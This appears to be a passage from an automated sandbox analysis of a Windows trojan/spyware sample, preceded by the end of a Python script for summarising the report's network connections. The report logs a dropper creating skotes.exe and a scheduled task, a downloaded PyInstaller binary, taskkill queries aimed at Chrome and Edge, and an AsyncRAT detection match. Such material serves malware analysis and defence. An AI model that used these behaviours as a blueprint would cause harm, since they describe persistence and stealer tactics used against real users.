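                conns[src]["client_to_server"] = True
            elif src == service_port:        # "443 -> client": reply
                conns[dst]["server_to_client"] = True
            continue
        m = TLS_RE.search(line)
        if m:
            sip, _sport, _cip, cport, ver = m.groups()
            c = conns[int(cport)]
            c["server"], c["tls"], c["label"] = sip, ver, label_ip(sip)
    return dict(conns)


def half_open(conns: dict) -> list:
    """Client ports for which only one direction was recorded."""
    return sorted(p for p, c in conns.items()
                  if c["client_to_server"] != c["server_to_client"])


def servers_by_label(conns: dict) -> Counter:
    """Count attributed sessions per server label (unattributed ones skipped)."""
    return Counter(c["label"] for c in conns.values() if c["server"])


if __name__ == "__main__":
    s = summarize(SAMPLE)
    for port in sorted(s):
        print(port, s[port])
    print("half-open:", half_open(s))
    print("by label:", servers_by_label(s))
```

Run it against the full report text instead of SAMPLE to get every client port with both directions and the two attributed servers; ports that appear in only one direction are usually just the sandbox's capture window cutting a session, not evidence on their own.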
Source: C:\Windows\System32\dxdiag.exe Windows user hook set: 0 mouse low level C:\Windows\system32\dinput8.dll
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB5CD0

System Summary

barindex
Source: dump.pcap, type: PCAP Matched rule: Detects AsyncRAT Author: ditekSHen
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E6964 7_2_00007FF7E12E6964
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C89E0 7_2_00007FF7E12C89E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E5C00 7_2_00007FF7E12E5C00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E08C8 7_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C1000 7_2_00007FF7E12C1000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DDA5C 7_2_00007FF7E12DDA5C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CA2DB 7_2_00007FF7E12CA2DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1944 7_2_00007FF7E12D1944
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D2164 7_2_00007FF7E12D2164
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D39A4 7_2_00007FF7E12D39A4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E08C8 7_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E6418 7_2_00007FF7E12E6418
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CA474 7_2_00007FF7E12CA474
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CACAD 7_2_00007FF7E12CACAD
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1B50 7_2_00007FF7E12D1B50
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E3C10 7_2_00007FF7E12E3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D2C10 7_2_00007FF7E12D2C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E5E7C 7_2_00007FF7E12E5E7C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D9EA0 7_2_00007FF7E12D9EA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DDEF0 7_2_00007FF7E12DDEF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1D54 7_2_00007FF7E12D1D54
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D5D30 7_2_00007FF7E12D5D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DE570 7_2_00007FF7E12DE570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D35A0 7_2_00007FF7E12D35A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E1874 7_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E40AC 7_2_00007FF7E12E40AC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D80E4 7_2_00007FF7E12D80E4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1740 7_2_00007FF7E12D1740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E9728 7_2_00007FF7E12E9728
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D8794 7_2_00007FF7E12D8794
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12D1F60 7_2_00007FF7E12D1F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C9800 7_2_00007FF7E12C9800
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E6964 8_2_00007FF7E12E6964
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C1000 8_2_00007FF7E12C1000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DDA5C 8_2_00007FF7E12DDA5C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CA2DB 8_2_00007FF7E12CA2DB
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1944 8_2_00007FF7E12D1944
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D2164 8_2_00007FF7E12D2164
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D39A4 8_2_00007FF7E12D39A4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C89E0 8_2_00007FF7E12C89E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E08C8 8_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E6418 8_2_00007FF7E12E6418
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CA474 8_2_00007FF7E12CA474
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CACAD 8_2_00007FF7E12CACAD
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1B50 8_2_00007FF7E12D1B50
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E3C10 8_2_00007FF7E12E3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D2C10 8_2_00007FF7E12D2C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E5C00 8_2_00007FF7E12E5C00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E5E7C 8_2_00007FF7E12E5E7C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D9EA0 8_2_00007FF7E12D9EA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DDEF0 8_2_00007FF7E12DDEF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1D54 8_2_00007FF7E12D1D54
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D5D30 8_2_00007FF7E12D5D30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DE570 8_2_00007FF7E12DE570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D35A0 8_2_00007FF7E12D35A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E1874 8_2_00007FF7E12E1874
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E08C8 8_2_00007FF7E12E08C8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E40AC 8_2_00007FF7E12E40AC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D80E4 8_2_00007FF7E12D80E4
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1740 8_2_00007FF7E12D1740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12E9728 8_2_00007FF7E12E9728
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D8794 8_2_00007FF7E12D8794
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12D1F60 8_2_00007FF7E12D1F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12C9800 8_2_00007FF7E12C9800
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9710 8_2_00007FF8B7EB9710
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB94B0 8_2_00007FF8B7EB94B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5350 8_2_00007FF8B7EB5350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE3A30 8_2_00007FF8B7EE3A30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE3300 8_2_00007FF8B7EE3300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8064C70 8_2_00007FF8B8064C70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B805CF30 8_2_00007FF8B805CF30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8002250 8_2_00007FF8B8002250
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF92B0 8_2_00007FF8B7FF92B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8047350 8_2_00007FF8B8047350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF6930 8_2_00007FF8B7FF6930
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8042950 8_2_00007FF8B8042950
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80099A0 8_2_00007FF8B80099A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FEFA10 8_2_00007FF8B7FEFA10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B804BB00 8_2_00007FF8B804BB00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8044B20 8_2_00007FF8B8044B20
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8036B40 8_2_00007FF8B8036B40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE9B90 8_2_00007FF8B7FE9B90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8092BF0 8_2_00007FF8B8092BF0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE3C10 8_2_00007FF8B7FE3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FFCC40 8_2_00007FF8B7FFCC40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803CC40 8_2_00007FF8B803CC40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B801CC59 8_2_00007FF8B801CC59
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8078C80 8_2_00007FF8B8078C80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B806ACA0 8_2_00007FF8B806ACA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803BCC0 8_2_00007FF8B803BCC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8030CE0 8_2_00007FF8B8030CE0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF9D00 8_2_00007FF8B7FF9D00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FEBD30 8_2_00007FF8B7FEBD30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800DDB0 8_2_00007FF8B800DDB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF0DC0 8_2_00007FF8B7FF0DC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8024E70 8_2_00007FF8B8024E70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B807CEA0 8_2_00007FF8B807CEA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8094FC0 8_2_00007FF8B8094FC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B806BFC0 8_2_00007FF8B806BFC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8008020 8_2_00007FF8B8008020
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8007040 8_2_00007FF8B8007040
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE4120 8_2_00007FF8B7FE4120
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF21E0 8_2_00007FF8B7FF21E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80A42B0 8_2_00007FF8B80A42B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FFD2B0 8_2_00007FF8B7FFD2B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B802F2D0 8_2_00007FF8B802F2D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800F2F0 8_2_00007FF8B800F2F0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE32F5 8_2_00007FF8B7FE32F5
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800D310 8_2_00007FF8B800D310
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B806A300 8_2_00007FF8B806A300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE7336 8_2_00007FF8B7FE7336
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FFC380 8_2_00007FF8B7FFC380
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80543B0 8_2_00007FF8B80543B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80854A0 8_2_00007FF8B80854A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE94D0 8_2_00007FF8B7FE94D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B802A510 8_2_00007FF8B802A510
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE4570 8_2_00007FF8B7FE4570
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80045A0 8_2_00007FF8B80045A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803B5B0 8_2_00007FF8B803B5B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80115A0 8_2_00007FF8B80115A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B800E5C0 8_2_00007FF8B800E5C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FF3650 8_2_00007FF8B7FF3650
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B803E670 8_2_00007FF8B803E670
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80406C0 8_2_00007FF8B80406C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8057750 8_2_00007FF8B8057750
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80527E6 8_2_00007FF8B80527E6
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE4820 8_2_00007FF8B7FE4820
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B804C840 8_2_00007FF8B804C840
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8025880 8_2_00007FF8B8025880
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FE288E 8_2_00007FF8B7FE288E
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7FEA8C0 8_2_00007FF8B7FEA8C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8261FB0 8_2_00007FF8B8261FB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B82623E0 8_2_00007FF8B82623E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8274810 8_2_00007FF8B8274810
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B82745C0 8_2_00007FF8B82745C0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8281300 8_2_00007FF8B8281300
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8282270 8_2_00007FF8B8282270
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8281950 8_2_00007FF8B8281950
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8331596 8_2_00007FF8B8331596
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B837D980 8_2_00007FF8B837D980
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8379A60 8_2_00007FF8B8379A60
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd 78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF7E12C2910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B8011E20 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B83AD32F appears 41 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF7E12C2710 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B7E8C400 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B83AD341 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B7FE9340 appears 135 times
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: String function: 00007FF8B7FEA500 appears 163 times
Source: _overlapped.pyd.7.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.7.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unknown Driver loaded: C:\Windows\System32\drivers\mstee.sys
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: dump.pcap, type: PCAP Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: file.exe Static PE information: Section: ZLIB complexity 0.9980096219346049
Source: file.exe Static PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9980096219346049
Source: skotes.exe.0.dr Static PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@147/209@43/19
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8C400 GetLastError,FormatMessageW,_Py_NoneStruct,_Py_NoneStruct,PyUnicode_FromWideChar,PyUnicode_DecodeMBCS,Py_BuildValue,LocalFree,PyErr_SetObject,_Py_Dealloc, 8_2_00007FF8B7E8C400
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBAC38 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CertOpenSystemStoreW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NewReference,PyLong_FromVoidPtr,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EBAC38
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT item1, item2 FROM metadata;
Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
